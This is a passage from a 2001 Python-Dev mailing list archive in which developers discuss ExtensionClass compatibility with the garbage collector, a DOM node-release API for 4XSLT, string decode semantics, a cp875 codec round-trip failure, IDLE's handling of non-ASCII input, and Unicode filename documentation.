1.5.2-compatible version of ExtensionClasses doesn't > even require recompilation to work with Python 2.1. I'll attach a copy below of the struct as defined in pygtk-0.7.0-unstable-dont-use.tar.gz (0.6.6 does not use extension classes). As you can see, it does not provide tp_flags, but has a field of tp_xxx4 for it. That *should* work, except that it also has its 'methods' field where tp_traverse would go, and its class_flags field where tp_clear would go. Now, you write > ExtensionClasses (at least recent versions that worked with 1.5.2) > contain a copy of the type object up to and including the tp_flags > field, and the 2.1 code is careful not to use any newer fields > without first checking the corresponding flag bit. In this generality, it is apparently not true: Modules/gcmodule.c has, in delete_garbage, if ((clear = op->ob_type->tp_clear) != NULL) { ... traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse; (void) traverse(PyObject_FROM_GC(gc), (visitproc)visit_decref, NULL); which does not check any flags. That still shouldn't cause any problems, since the Gtk objects should never end up in the GC lists - but may be I'm missing something. Regards, Martin typedef struct { PyObject_VAR_HEAD char *tp_name; /* For printing */ int tp_basicsize, tp_itemsize; /* For allocation */ /* Methods to implement standard operations */ destructor tp_dealloc; printfunc tp_print; getattrfunc tp_getattr; setattrfunc tp_setattr; cmpfunc tp_compare; reprfunc tp_repr; /* Method suites for standard classes */ PyNumberMethods *tp_as_number; PySequenceMethods *tp_as_sequence; PyMappingMethods *tp_as_mapping; /* More standard operations (at end for binary compatibility) */ hashfunc tp_hash; ternaryfunc tp_call; reprfunc tp_str; getattrofunc tp_getattro; setattrofunc tp_setattro; /* Space for future expansion */ long tp_xxx3; long tp_xxx4; char *tp_doc; /* Documentation string */ #ifdef COUNT_ALLOCS /* these must be last */ int tp_alloc; int tp_free; int tp_maxalloc; struct _typeobject *tp_next; #endif PyMethodChain methods; long class_flags; PyObject *class_dictionary; PyObject *bases; PyObject *reserved; } PyExtensionClass; From martin at loewis.home.cs.tu-berlin.de Sun May 13 14:08:02 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 14:08:02 +0200 Subject: [Python-Dev] ReleaseNode interface in 4XSLT Message-ID: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> Currently, 4XSLT has a dependency on the DOM implementation in terms of memory management (among other dependencies). I'd like to reduce this dependency, by providing a centralized function that knows how to release nodes. In PyXML, I currently use # Define ReleaseNode in a DOM-independent way import xml.dom.ext import xml.dom.minidom def _releasenode(n): if isinstance(n, xml.dom.minidom.Node): n.unlink() else: xml.dom.ext.ReleaseNode(n) try: from Ft.Lib import pDomlette def ReleaseNode(n): if isinstance(n, pDomlette.Node): pDomlette.ReleaseNode(n) else: _releasenode(n) _XsltElementBase = pDomlette.Element except ImportError: ReleaseNode = _releasenode from minisupport import _XsltElementBase This code knows how to release minidom, 4DOM, and pDomlette nodes, and supports installations without 4Suite (i.e. without pDomlette). I've put this into xslt/__init__.py, so that all callers of Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode. If desired, I could produce a patch against the public Ft CVS. As a slightly independent question, such a function also ought to support DOM implementations not known to it; I'm thinking in particular of the Zope DOMs. I'd like to hear proposals on how such an interface should work; I see three options: a) it is an operation on the document node (or any node), as in minidom. b) it is an operation on the DOM implementation (almost as in 4Suite; you'd need to navigate from the node to the implementation, then you'd need a well-known operation on the implementation) c) the code assumes that no release activity is necessary for unknown DOMs, effectively believing in reference counting, garbage collection, acquisition, and other black art. Any comments appreciated, in particular 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and 2. from authors of other DOMs on a general memory management API for Python DOM. Regards, Martin From mwh at python.net Sun May 13 14:36:26 2001 From: mwh at python.net (Michael Hudson) Date: 13 May 2001 13:36:26 +0100 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: "M.-A. Lemburg"'s message of "Fri, 11 May 2001 12:07:40 +0200" References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > Fredrik Lundh wrote: > > can you take that again? shouldn't michael's example be > > equivalent to: > > > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > > > if not, I'd argue that your "decode" design is broken, instead > > of just buggy... > > Well, it is sort of broken, I agree. The reason is that > PyString_Encode() and PyString_Decode() guarantee the returned > object to be a string object. To be able to reuse Unicode codecs > I added code which converts Unicode back to a string in case the > codec return an Unicode object (which the .decode() method does). > This is what's failing. It strikes me that if someone executes aString.decode("latin-1") they're going to expect a unicode string. AIUI, what's currently happening is that the string is converted from a latin-1 8-bit string to the 16-bit unicode string I expected and then there is an attempt to convert it back to an 8-bit string using the default encoding. So if I'd done a sys.setdefaultencoding("latin-1") in my sitecustomize.py, then aString.decode("latin-1") would just be aString again? This doesn't seem optimal. > Perhaps I should simply remove the restriction and have both APIs > return the codec's return object as-is ?! (I would be in favour of > this, but I'm not sure whether this is already in use by someone...) Are all the codecs ditributed with Python 2.1 unicode-related? If that's the case, PyString_Decode isn't terribly useful is it? It seems unlikely that it received much use. Could be wrong of course. OTOH, maybe I'm trying to wedge to much behaviour onto a a particular operation. Do we want open(file).read().decode("jpeg") -> some kind of PIL object to be possible? Cheers, M. -- GET *BONK* BACK *BONK* IN *BONK* THERE *BONK* -- Naich using the troll hammer in cam.misc From mal at lemburg.com Sun May 13 18:53:55 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 18:53:55 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <3AFBB221.F29BCB9A@lemburg.com> <049801c0d9fe$cd98aef0$e46940d5@hagrid> <3AFBB9EC.F75C158D@lemburg.com> Message-ID: <3AFEBC22.1F0AF685@lemburg.com> Michael Hudson wrote: > > "M.-A. Lemburg" writes: > > > Fredrik Lundh wrote: > > > can you take that again? shouldn't michael's example be > > > equivalent to: > > > > > > unicode(u"\u00e3".encode("latin-1"), "latin-1") > > > > > > if not, I'd argue that your "decode" design is broken, instead > > > of just buggy... > > > > Well, it is sort of broken, I agree. The reason is that > > PyString_Encode() and PyString_Decode() guarantee the returned > > object to be a string object. To be able to reuse Unicode codecs > > I added code which converts Unicode back to a string in case the > > codec return an Unicode object (which the .decode() method does). > > This is what's failing. > > It strikes me that if someone executes > > aString.decode("latin-1") > > they're going to expect a unicode string. AIUI, what's currently > happening is that the string is converted from a latin-1 8-bit string > to the 16-bit unicode string I expected and then there is an attempt > to convert it back to an 8-bit string using the default encoding. So > if I'd done a > > sys.setdefaultencoding("latin-1") > > in my sitecustomize.py, then aString.decode("latin-1") would just be > aString again? This doesn't seem optimal. True and that's why I am proposing to losen the restriction on having the two APIs returning strings only. > > Perhaps I should simply remove the restriction and have both APIs > > return the codec's return object as-is ?! (I would be in favour of > > this, but I'm not sure whether this is already in use by someone...) > > Are all the codecs ditributed with Python 2.1 unicode-related? If > that's the case, PyString_Decode isn't terribly useful is it? It > seems unlikely that it received much use. Could be wrong of course. All standard codecs in 2.0 and 2.1 are Unicode related. I am planning to write up a bunch of string-to-string codecs next week though which will then be the first non-Unicode related codecs in 2.2. > OTOH, maybe I'm trying to wedge to much behaviour onto a a particular > operation. Do we want > > open(file).read().decode("jpeg") -> some kind of PIL object > > to be possible? This would be possible indeed. Even though some may find this coding style obscure, I think this technique has the same usefulness as e.g. piping at OS level. I am thinking of these use cases: "???".decode("latin-1") -> Unicode (object construction) "...jpeg data...".decode("jpeg") -> JpegImage object (dito) "???".decode("latin-1").encode("cp1521") -> string (recoding data) "...long data...".encode("gzip") -> string (transfer encoding) "...gzipped data...".decode("gzip") -> string (transfer decoding) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Sun May 13 19:20:01 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 19:20:01 +0200 Subject: [Python-Dev] Re: Ill-defined encoding for CP875? References: Message-ID: <3AFEC241.62084286@lemburg.com> Tim Peters wrote: > > I have a way to make dict lookup a teensy bit cheaper(*) that significantly > reduces the number of collisions (which is much more valuable). > > This caused a number of std tests to fail, because they were implicitly > relying on the order in which a dict's entries are materialized via .keys() > or .items(). > > Most of these were easy enough to fix. The last failure remaining is > test_unicode, and I don't know how to fix it. It's dying here: > > try: > verify(unicode(s,encoding).encode(encoding) == s) > except TestFailed: > print '*** codec "%s" failed round-trip' % encoding > except ValueError,why: > print '*** codec for "%s" failed: %s' % (encoding, why) > > when encoding == "cp875". There's a bogus problem you have to worm around > first: test_unicode neglected to import TestFailed, so it actually dies > with NameError while trying the "except TestFailed" clause after verify() > raises TestFailed. Once that's repaired, it's complaining about failing the > round-trip encoding. Ooops; this must have been caused by the assert statment removal in the test suite I hacked up some months ago. Funny that it never showed up... the code seems to be very robust ;-) > The original character in s it's griping about is "?" (0x3f). cp875.py has > this entry in its decoding_map dict: > > 0x003f: 0x001a, # SUBSTITUTE > > But 0x1a is not a *unique* value in this dict. There's also > > 0x00dc: 0x001a, # SUBSTITUTE > 0x00e1: 0x001a, # SUBSTITUTE > 0x00ec: 0x001a, # SUBSTITUTE > 0x00ed: 0x001a, # SUBSTITUTE > 0x00fc: 0x001a, # SUBSTITUTE > 0x00fd: 0x001a, # SUBSTITUTE > > Therefore what appears associated with 0x1a in the derived encoding_map > dict: > > encoding_map = {} > for k,v in decoding_map.items(): > encoding_map[v] = k > > may end up being any of the 7 decoding_map keys that map to 0x1a. It just > so happened to map back to 0x3f before, but to 0xfd after the dict change, > so "?" doesn't survive the round trip anymore. The "right" thing to do here, is to simply remove cp875 from the test for round-tripping. It is not the only encoding which fails this test, but it's not our fault: the codecs were all generated from the original codec maps at the Unicode.org site. If their mappings are broken, we can't do much about it... other than to ignore the error or remove the codec altogether. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Sun May 13 19:40:58 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Sun, 13 May 2001 19:40:58 +0200 Subject: [Python-Dev] IDLE and non-ASCII characters References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Message-ID: <3AFEC72A.33076220@lemburg.com> Martin von Loewis wrote: > > Thanks to a bug report I got, I noticed for the first time that you > cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell > prompt, you may get > > >>> s='??' > UnicodeError: ASCII encoding error: ordinal not in range(128) > > Likewise, when trying to save a file that has non-ASCII characters, > you get a traceback. > > Now, I think I understand all the causes of the problem (Tkinter > returning Unicode objects, and so on). However, I'm curious whether > anybody has proposals on how to deal with it. > > For saving text files, if Python had an encoding directive, things > might be easier :-) For the shell prompt, I've no idea how to solve > this best. > > So any suggestions are welcome. I have a bug report assigned to myself which indicates similar problems with _tkinter and Tk/Tcl. There were other problem reports on the German Python mailing list going in the same direction too. The basic problem seems to be that Tk/Tcl applies too much magic to the text widget contents in order to find out the used encoding and this can easily cause the whole encoding mechanism to fail. A Tk/Tcl expert should really look into this and fix _tkinter.c to aid Tk/Tcl in not mixing up the encodings (e.g. it would probably be a good idea to recode Python 8bit-strings into whatever encoding Tk/Tcl assumes as default). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From Mike.Olson at fourthought.com Sun May 13 20:15:46 2001 From: Mike.Olson at fourthought.com (Mike Olson) Date: Sun, 13 May 2001 12:15:46 -0600 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> Message-ID: <3AFECF52.FF7E9B26@FourThought.com> "Martin v. Loewis" wrote: > > > In PyXML, I currently use > > # Define ReleaseNode in a DOM-independent way > import xml.dom.ext > import xml.dom.minidom > def _releasenode(n): > if isinstance(n, xml.dom.minidom.Node): > n.unlink() > else: > xml.dom.ext.ReleaseNode(n) > > try: > from Ft.Lib import pDomlette > def ReleaseNode(n): > if isinstance(n, pDomlette.Node): > pDomlette.ReleaseNode(n) > else: > _releasenode(n) > _XsltElementBase = pDomlette.Element > except ImportError: > ReleaseNode = _releasenode > from minisupport import _XsltElementBase > > This code knows how to release minidom, 4DOM, and pDomlette nodes, and > supports installations without 4Suite (i.e. without pDomlette). I've > put this into xslt/__init__.py, so that all callers of > Ft.Lib.pDomlette.ReleaseNode now need to call xml.xslt.ReleaseNode. > If desired, I could produce a patch against the public Ft CVS. What if we put these on the implementation, that or came up with a standard interface on the node. Then, every DOM imp that wants to be compatible with xpath/xslt needs to support this interface? node.ownerDocument.implementation.releaseNode(node) or node.py_unlink() > > As a slightly independent question, such a function also ought to > support DOM implementations not known to it; I'm thinking in > particular of the Zope DOMs. I'd like to hear proposals on how such an > interface should work; I see three options: See above > > a) it is an operation on the document node (or any node), as in minidom. > b) it is an operation on the DOM implementation (almost as in 4Suite; > you'd need to navigate from the node to the implementation, then > you'd need a well-known operation on the implementation) > c) the code assumes that no release activity is necessary for unknown > DOMs, effectively believing in reference counting, garbage collection, > acquisition, and other black art. I like either a or b Mike > > Any comments appreciated, in particular > 1. from the Ft maintainers on introducing xml.xslt.ReleaseNode, and > 2. from authors of other DOMs on a general memory management API for > Python DOM. > > Regards, > Martin > > _______________________________________________ > 4suite mailing list > 4suite at lists.fourthought.com > http://lists.fourthought.com/mailman/listinfo/4suite -- Mike Olson Principal Consultant mike.olson at fourthought.com (303)583-9900 x 102 Fourthought, Inc. http://Fourthought.com Software-engineering, knowledge-management, XML, CORBA, Linux, Python From tim.one at home.com Sun May 13 20:31:42 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 14:31:42 -0400 Subject: [Python-Dev] RE: Ill-defined encoding for CP875? In-Reply-To: <3AFEC241.62084286@lemburg.com> Message-ID: [M.-A. Lemburg] > ... > The "right" thing to do here, is to simply remove cp875 > from the test for round-tripping. I'm relieved you think so, since that's what I already did . > It is not the only encoding which fails this test, but it's not > our fault: the codecs were all generated from the original codec > maps at the Unicode.org site. > > If their mappings are broken, we can't do much about it... other > than to ignore the error or remove the codec altogether. On general principle I don't like either of those -- "in the face of ambiguity, refuse the temptation to guess". It's at least surprising to see >>> unicode("?", "cp875").encode("cp875") '\xfd' >>> now, yes? Would it be better if an ambiguous encoding raised an exception in "strict" mode? That is, a third choice is to alert users when they're relying on a broken part of a mapping. From martin at loewis.home.cs.tu-berlin.de Sun May 13 21:08:47 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 13 May 2001 21:08:47 +0200 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT In-Reply-To: <3AFECF52.FF7E9B26@FourThought.com> (message from Mike Olson on Sun, 13 May 2001 12:15:46 -0600) References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> Message-ID: <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> > What if we put these on the implementation, that or came up with a > standard interface on the node. Then, every DOM imp that wants to be > compatible with xpath/xslt needs to support this interface? > > > node.ownerDocument.implementation.releaseNode(node) > > or > > node.py_unlink() releaseNode sounds good to me; it is unlikely that W3C would give an operation that name but a different meaning. Any objections? Regards, Martin From tim.one at home.com Sun May 13 21:45:40 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 15:45:40 -0400 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: > http://sourceforge.net/tracker/?func=detail&atid=305470&aid=410465& > group_id=5470 > > Category: core (C code) > Group: None > >Status: Closed > >Resolution: Accepted > Priority: 5 > Submitted By: Mark Hammond (mhammond) > Assigned to: Mark Hammond (mhammond) > Summary: Allow pre-encoded strings as filenames > > Initial Comment: > This patch enables most filename parameters to use pre- > encoded strings. On Windows, the default of "mbcs" is > used. On all other platforms, the default filename > encoding is the same as the general default encoding, > which in reality means there is no functional change. > However, other platforms can simply plugin their own > encodings. > ... Mark (or anyone else who understands all this), were doc changes included? Can someone please add a briefer user-oriented blurb to Misc/NEWS too? From tim.one at home.com Sun May 13 22:54:50 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 16:54:50 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.76,2.77 In-Reply-To: <004001c0d919$a62de7d0$e46940d5@hagrid> Message-ID: ]/F] > as a footnote, SRE uses the same source code to generate > both 8-bit and 16-bit versions of the match engine. I see no > reason why we cannot do the same for the string operations > (PyString, PyUnicode, and strop). > > if anyone wants me to look into this, just say "go ahead". go ahead Here's another idea: whenever we fix or extend Python's "%" formats, it requires changes in both stringobject.c and unicodeobject.c, but they've diverged in irritating ways that make it a fresh adventure in each. In the early days, Python handled % formats pretty much by just building a format string and passing that on to C's sprintf. But as the years have gone by, and the number of buggy platforms increased, Python has taken over more & more of it itself. For example, it doesn't trust sprintf to deal with justification, 0-fill or blank-fill, and needed to grow its own from-scratch code for integer conversion in order to handle Python longs. In addition, it also grew a PyErr_Format() routine as yet another layer of simulating what a safe sprintf-alike should do. Even with all that, we've still got platform bugs due to, e.g., platform %#x and %#o conversion adding base markers when "they shouldn't" (according to C), or not adding them when "they should" (according to Python). All in all, the code would be simpler and quicker now if we left the platform sprintf out of sprintf operations entirely . The only thing we're not simulating ourselves is float->string conversion. Unfortunately, we can't do that without also doing string->float, because platforms vary in the float strings they can read back (e.g., if Python does float->string and produces "Inf" for positive infinity, but uses strtod or atof to read floats back in, it's a x-platform crapshoot whether "Inf" can be read back in). but-in-favor-of-merging-the-code-even-without-that-ly y'rs - tim From tim.one at home.com Sun May 13 23:00:32 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 17:00:32 -0400 Subject: [Python-Dev] test___all__ failing on WIndows In-Reply-To: <15098.42607.84670.323361@beluga.mojam.com> Message-ID: [skip at pobox.com] > I (thankfully) gave up even pretending to run Windows recently, so > I can only make a suggestion for others who look into this problem. > Try this: > Change test___all__.check_all so that the except clause reads: > > except ImportError, msg: > > then print out msg when an import fails. You should get the actual > module that failed to import. Yes, that confirmed termios was the culprit. Thanks! Fixed by adding import termios del termios in pty.py. As the irritated comment before this new code says, this is absurd. since-you're-on-a-roll-how-about-fixing-test_urllib2-too-ly y'rs - tim From guido at digicool.com Mon May 14 00:26:39 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:26:39 -0500 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: Your message of "Sun, 13 May 2001 00:32:10 +0200." <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> Message-ID: <200105132226.RAA21159@cj20424-a.reston1.va.home.com> > > Now, if you are using the 1.4 version of ExtensionClasses you might > > not have the tp_flags field either (I don't know, I can't easily > > check) but the 1.5.2-compatible version of ExtensionClasses doesn't > > even require recompilation to work with Python 2.1. > > I'll attach a copy below of the struct as defined in > pygtk-0.7.0-unstable-dont-use.tar.gz Hmm... I like that filename. :-) > (0.6.6 does not use extension > classes). As you can see, it does not provide tp_flags, but has a > field of tp_xxx4 for it. Sorry, that's what I meant. This is guaranteed to be initialized to 0 (unless a module goes out of its way to put a value in it, in which case they deserve what they get). > That *should* work, except that it also has its 'methods' field where > tp_traverse would go, and its class_flags field where tp_clear would > go. > > Now, you write > > > ExtensionClasses (at least recent versions that worked with 1.5.2) > > contain a copy of the type object up to and including the tp_flags > > field, and the 2.1 code is careful not to use any newer fields > > without first checking the corresponding flag bit. > > In this generality, it is apparently not true: Modules/gcmodule.c has, > in delete_garbage, > > if ((clear = op->ob_type->tp_clear) != NULL) { > ... > traverse = PyObject_FROM_GC(gc)->ob_type->tp_traverse; > (void) traverse(PyObject_FROM_GC(gc), > (visitproc)visit_decref, > NULL); > > which does not check any flags. That still shouldn't cause any > problems, since the Gtk objects should never end up in the GC lists - > but may be I'm missing something. I agree with your analysis: op here is gotten from a PyGC_Head, so it cannot be a PyExtensionClass instance, so Neil's code should be safe. Objects never have a GC head unless they specifically request it; PyExtensionClass certainly doesn't request a GC head. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Mon May 14 00:37:44 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:37:44 -0500 Subject: [Python-Dev] Type/class In-Reply-To: Your message of "Sat, 12 May 2001 16:53:26 -0400." References: Message-ID: <200105132237.RAA21223@cj20424-a.reston1.va.home.com> > As I said earlier: the only advantage would be if it could simplify > things "under the hood" (compared to metaclasses) but could still > provide the same Class semantics (with maybe a "proto" declaration > sneaking it's nose in under the tent.) > But I have no immediate idea on how to do that, and it sounds like > you're pretty far along into an implementation already. I don't know how to do it either, but I suspect it wouldn't be easy. > I guess my practical quesion, which I meant to ask before I got > myself sidetracked into preaching prototypes is: How much of the > existing plumbing (specifically the Don Beaudry hack) can I rely > on in the future for the objective-C/python bridge ? > With BOOST and Zope's extension classes relying on it, can I > assume that it's being extended rather than replaced ? > ( I guess I ought to take a look at the code! ) I'm currently not too concerned with backwards compatibility, and Jim Fulton has proclaimed that he would prefer to get rid of ExtensionClassess (since what I'm building goes way beyond them!), so I'm not sure I can be motivated to support just for BOOST's sake. There will be a replacement mechanism that will be at least as powerful, and I'm sure that BOOST etc. can be rewritten to use the new mechanism easily. That's what we're planning for Zope. > Guido: did you ever imagine back at that first workshop at NIST > that you and Python would be where you are today ? No way! I knew I was on to something, but I had no idea onto what... I'll always hold on to the T-shirt you made. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Mon May 14 00:43:57 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:43:57 -0500 Subject: [Python-Dev] status of pre? In-Reply-To: Your message of "Sat, 12 May 2001 00:18:27 +0200." <00ca01c0da68$4fc66570$e46940d5@hagrid> References: <15100.4754.950053.844678@cj42289-a.reston1.va.home.com> <200105111847.NAA05835@cj20424-a.reston1.va.home.com> <00ca01c0da68$4fc66570$e46940d5@hagrid> Message-ID: <200105132243.RAA21290@cj20424-a.reston1.va.home.com> > 2.2 is to be released in october, right? I'm sure I could shake > out the remaining bugs in my "stackless SRE" patch until then... Knowing you that means you'd start working on them late September. :-) There's actually a possibility that if my types/classes stuff goes well, Digital Creations will ask for a 2.2 release sooner (e.g. July). This might have an experimental status, e.g. it might not be backwards compatible, but it would be the version required by Zope 2.4. On the other hand, none of that may happen, or that release would be labeled 2.2b1 or something, or Zope 2.4 might come out after October. What I'm trying to say is, please try to fix stackless SRE sooner rather than later! --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Mon May 14 00:51:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Sun, 13 May 2001 17:51:17 -0500 Subject: [Python-Dev] IDLE and non-ASCII characters In-Reply-To: Your message of "Fri, 11 May 2001 22:53:55 +0200." <200105112053.WAA15657@pandora.informatik.hu-berlin.de> References: <200105112053.WAA15657@pandora.informatik.hu-berlin.de> Message-ID: <200105132251.RAA21344@cj20424-a.reston1.va.home.com> > Thanks to a bug report I got, I noticed for the first time that you > cannot enter non-ASCII characters in IDLE anymore. Eg. at the shell > prompt, you may get > > >>> s='??' > UnicodeError: ASCII encoding error: ordinal not in range(128) This doesn't bother me, because I don't know how to enter such characters with my US keyboard anyway. :-) :-) > Likewise, when trying to save a file that has non-ASCII characters, > you get a traceback. Yes, this has bitten me once. It was very painful (I lost a few hours worth of writing). In other words, I agree it's a problem! > Now, I think I understand all the causes of the problem (Tkinter > returning Unicode objects, and so on). However, I'm curious whether > anybody has proposals on how to deal with it. Not me -- unfortunately, there are too many alternatives to IDLE to be able to justify working on it much. > For saving text files, if Python had an encoding directive, things > might be easier :-) For the shell prompt, I've no idea how to solve > this best. > > So any suggestions are welcome. Ditto. Postscript: using cut and paste, I *can* enter "s='??'" in IDLE at the Python prompt, both on Linux and on Windows 98. It prints as '\xe4\xf6' on both systems. What changed? --Guido van Rossum (home page: http://www.python.org/~guido/) From Mike.Olson at fourthought.com Mon May 14 03:02:03 2001 From: Mike.Olson at fourthought.com (Mike Olson) Date: Sun, 13 May 2001 19:02:03 -0600 Subject: [Python-Dev] Re: [4suite] ReleaseNode interface in 4XSLT References: <200105131208.f4DC82o11349@mira.informatik.hu-berlin.de> <3AFECF52.FF7E9B26@FourThought.com> <200105131908.f4DJ8lh14249@mira.informatik.hu-berlin.de> Message-ID: <3AFF2E8B.31B9ED97@FourThought.com> "Martin v. Loewis" wrote: > > > What if we put these on the implementation, that or came up with a > > standard interface on the node. Then, every DOM imp that wants to be > > compatible with xpath/xslt needs to support this interface? > > > > > > node.ownerDocument.implementation.releaseNode(node) > > > > or > > > > node.py_unlink() > > releaseNode sounds good to me; it is unlikely that W3C would give an > operation that name but a different meaning. Any objections? Should we standardize all of the python xml extensions with a py prefix? pyReleaseNode or py_releaseNode? Then we will never have to worry about a name clash. Mike > > Regards, > Martin -- Mike Olson Principal Consultant mike.olson at fourthought.com (303)583-9900 x 102 Fourthought, Inc. http://Fourthought.com Software-engineering, knowledge-management, XML, CORBA, Linux, Python From MarkH at ActiveState.com Mon May 14 03:37:35 2001 From: MarkH at ActiveState.com (Mark Hammond) Date: Mon, 14 May 2001 11:37:35 +1000 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: [Tim] > Mark (or anyone else who understands all this), were doc changes included? > Can someone please add a briefer user-oriented blurb to Misc/NEWS too? No problem. Where should the "real" documentation go? It seems maybe we need a new sub-heading under the "6.1 - os -- Misc. OS Interface" - something like: 6.1.x - Unicode and the file system - general discussion. - Windows specific - Mac specific should that appear. - OS' with no special support (ie, "the rest") Does that make sense? I have made this change to Misc/NEWS. Does this look OK (obviously once I know what to replace "[????]" with :) And-I-will-do-the-registry-docs-at-the-same-time ly, Mark. Index: NEWS =================================================================== RCS file: /cvsroot/python/python/dist/src/Misc/NEWS,v retrieving revision 1.166 diff -r1.166 NEWS 4a5,21 > - Some operating systems now support the concept of a default Unicode > encoding for file system operations. Notably, Windows supports 'mbcs' > as the default. The Macintosh will also adopt this concept in the medium > term, altough the default encoding for that platform will be other than > 'mbcs'. > On operating system that support non-ascii filenames, it is common for > functions that return filenames (such as os.listdir()) to return Python > string objects pre-encoded using the default file system encoding for > the platform. As this encoding is likely to be different from Python's > default encoding, converting this name to a Unicode object before passing > it back to the Operating System would result in a Unicode error, as Python > would attempt to use it's default encoding (generally ASCII) rather > than the default encoding for the file system. > In general, this change simply removes surprises when working with > Unicode and the file system, making these operations work as > you expect, increasing the transparency of Unicode objects in this context. > See [????] for more details, including examples. From tim.one at home.com Mon May 14 04:52:22 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 13 May 2001 22:52:22 -0400 Subject: [Python-Dev] RE: [Patches] [ python-Patches-410465 ] Allow pre-encoded strings as filenames In-Reply-To: Message-ID: [Mark Hammond] > ... > Where should the "real" documentation go? It seems maybe we need a > new sub-heading under the "6.1 - os -- Misc. OS Interface" - something > like: > > 6.1.x - Unicode and the file system > - general discussion. > - Windows specific > - Mac specific should that appear. > - OS' with no special support (ie, "the rest") > > Does that make sense? So far is it goes, yes. I think the manual desperately needs a Unicode section for other reasons, though: from traffic on c.l.py, it's clear that few people can figure out how to do *anything* with Unicode now unless their first name begins with "M" (Mark, Martin, Marc -- definitely not Skip ). There's no overview and there are no examples. The primary string method doesn't even mention Unicode (here paraphrasing questions that pop up): encode([encoding[,errors]]) Return an encoded version of the string. What does "encoded version" mean? Is that another string? An encoding object of some sort? Etc. Default encoding is the current default string encoding. What's the "current default string encoding"? How can I find out? Can't even guess what *type* it has (string? magic object? little integer?). If I don't want the default encoding, how do I specify a different one? What are the possible values? Again, can't even guess the type of the object that needs to be passed for encoding. errors may be given to set a different error handling scheme. The default for errors is 'strict', meaning that encoding errors raise a ValueError. Other possible values are 'ignore' and 'replace'. So what do 'ignore' and 'replace' mean? There's more left unsaid here than a single example could clarify, but there's not even an example -- so people stare at this wholly uncomprehending. If they stumble into the unicode() builtin function (in a different part of the manual, neither referencing nor referenced by the .encode() method), it's no better: unicode(string[, encoding[, errors]]) Decodes string using the codec for encoding. What? Hard to even guess what the function returns. Maybe, from the name, a Unicode string? Error handling is done according to errors. What? The default behavior is to decode UTF-8 in strict mode, meaning that encoding errors raise ValueError. How do encoding errors arise from a function that *de*codes? See also the codecs module. Which helps, but the relationship between the codecs module and the unicode() function isn't spelled out there either. Look up "encdoing" in the index, and you get pointers to base64, quoted-printable and the mimetypes module, which only confuses things more. I don't expect you to fix this , I'm trying to get across that the Unicode docs need work even without new gimmicks. If Fred agrees, I'm sure he'll think of a good place to put the new info too. > I have made this change to Misc/NEWS. Does this look OK > (obviously once I know what to replace "[????]" with :) Absolutely, and I don't even have to read it to say so : once *something* is checked in, we're assured it won't get dropped on the floor come release time, and anyone who has any quibbles with it can check in changes. It's not like checking in a NEWS item can break the std test suite or cause HP-UX to crash. well-not-really-sure-about-the-latter-ly y'rs - tim From barry at digicool.com Mon May 14 06:16:18 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Mon, 14 May 